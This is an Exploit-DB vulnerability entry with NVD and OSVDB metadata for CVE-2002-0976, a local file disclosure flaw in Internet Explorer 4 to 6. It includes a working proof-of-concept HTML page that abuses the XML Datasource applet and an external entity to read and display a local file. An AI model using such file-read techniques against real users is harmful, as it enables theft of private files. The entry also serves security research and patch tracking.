Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability
2002-08-17T00:00:00
ID EDB-ID:21721 Type exploitdb Reporter Jelmer Modified 2002-08-17T00:00:00
Description
Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability. CVE-2002-0976. Local exploit for windows platform
source: http://www.securityfocus.com/bid/5490/info
A problem in Microsoft Internet Explorer could lead to the disclosure of sensitive information.
Due to the design of the datasource applet, it may be possible for a user to view the contents of local files via a remote page. By building a custom-crafted page that specifies the code base as the local system, it would be possible to display the contents of known local files.
<html>
<head>
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
]>
<file>
&contents;
</file>
</applet>
<script language="javascript">
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>
{"id": "EDB-ID:21721", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability", "description": "Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability. CVE-2002-0976. Local exploit for windows platform", "published": "2002-08-17T00:00:00", "modified": "2002-08-17T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/21721/", "reporter": "Jelmer", "references": [], "cvelist": ["CVE-2002-0976"], "lastseen": "2016-02-02T17:07:15", "viewCount": 7, "enchantments": {"score": {"value": 4.5, "vector": "NONE", "modified": "2016-02-02T17:07:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0976"]}, {"type": "osvdb", "idList": ["OSVDB:2977"]}], "modified": "2016-02-02T17:07:15", "rev": 2}, "vulnersScore": 4.5}, "sourceHref": "https://www.exploit-db.com/download/21721/", "sourceData": "source: http://www.securityfocus.com/bid/5490/info\r\n\r\nA problem in Microsoft Internet Explorer could lead to the disclosure of sensitive information.\r\n\r\nDue to the design of the datasource applet, it may be possible for a user to view the contents of local files via a remote page. By building a custom-crafted page that specifies the code base as the local system, it would be possible to display the contents of known local files.\r\n\r\n<html>\r\n<head>\r\n<base href=\"file:///C:/\">\r\n</head>\r\n<body>\r\n<applet code=\"com.ms.xml.dso.XMLDSO.class\" width=\"0\" height=\"0\" id=\"xmldso\" MAYSCRIPT=\"true\">\r\n<?xml version=\"1.0\"?>\r\n<!DOCTYPE file [\r\n<!ELEMENT file (#PCDATA) >\r\n<!ENTITY contents SYSTEM \"file:///C:/jelmer.txt\">\r\n]>\r\n<file>\r\n&contents;\r\n</file>\r\n</applet>\r\n<script language=\"javascript\">\r\nsetTimeout(\"showIt()\",2000);\r\nfunction showIt() {\r\nvar jelmer = xmldso.getDocument();\r\nalert(jelmer.Text);\r\n}\r\n</script>\r\n</body>\r\n</html>", "osvdbidlist": ["2977"]}
{"cve": [{"lastseen": "2020-10-03T11:37:00", "description": "Internet Explorer 4.0 and later allows remote attackers to read arbitrary files via a web page that accesses a legacy XML Datasource applet (com.ms.xml.dso.XMLDSO.class) and modifies the base URL to point to the local system, which is trusted by the applet.", "edition": 3, "cvss3": {}, "published": "2002-09-24T04:00:00", "title": "CVE-2002-0976", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0976"], "modified": "2016-10-18T02:23:00", "cpe": ["cpe:/a:microsoft:ie:5.0.1", "cpe:/a:microsoft:ie:4.0", "cpe:/a:microsoft:ie:4.0.1", "cpe:/a:microsoft:ie:6.0", "cpe:/a:microsoft:ie:5.5", "cpe:/a:microsoft:ie:5.0"], "id": "CVE-2002-0976", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0976", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:ie:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.5:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.0.1:sp1:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.5:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.0.1:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:4.0.1:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:ie:5.5:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2002-0976"], "edition": 1, "description": "## Vulnerability Description\nMicrosoft Internet Explorer may allow remote attackers to read the contents of local files. Due to a flaw in the XML Datasource applet, if \"file:///C:/\" is specified as the codebase reference in the HTML header, the attacker could use the XMLDSO applet to read local files on the system.\n\n\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nMicrosoft Internet Explorer may allow remote attackers to read the contents of local files. Due to a flaw in the XML Datasource applet, if \"file:///C:/\" is specified as the codebase reference in the HTML header, the attacker could use the XMLDSO applet to read local files on the system.\n\n\n## References:\nMicrosoft Security Bulletin: MS03-015\nMicrosoft Security Bulletin: MS03-011\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-08/0162.html\nISS X-Force ID: 9885\n[CVE-2002-0976](https://vulners.com/cve/CVE-2002-0976)\nBugtraq ID: 5490\n", "modified": "2002-08-17T00:00:00", "published": "2002-08-17T00:00:00", "id": "OSVDB:2977", "href": "https://vulners.com/osvdb/OSVDB:2977", "title": "Microsoft IE XML Datasource Read Local Files", "type": "osvdb", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}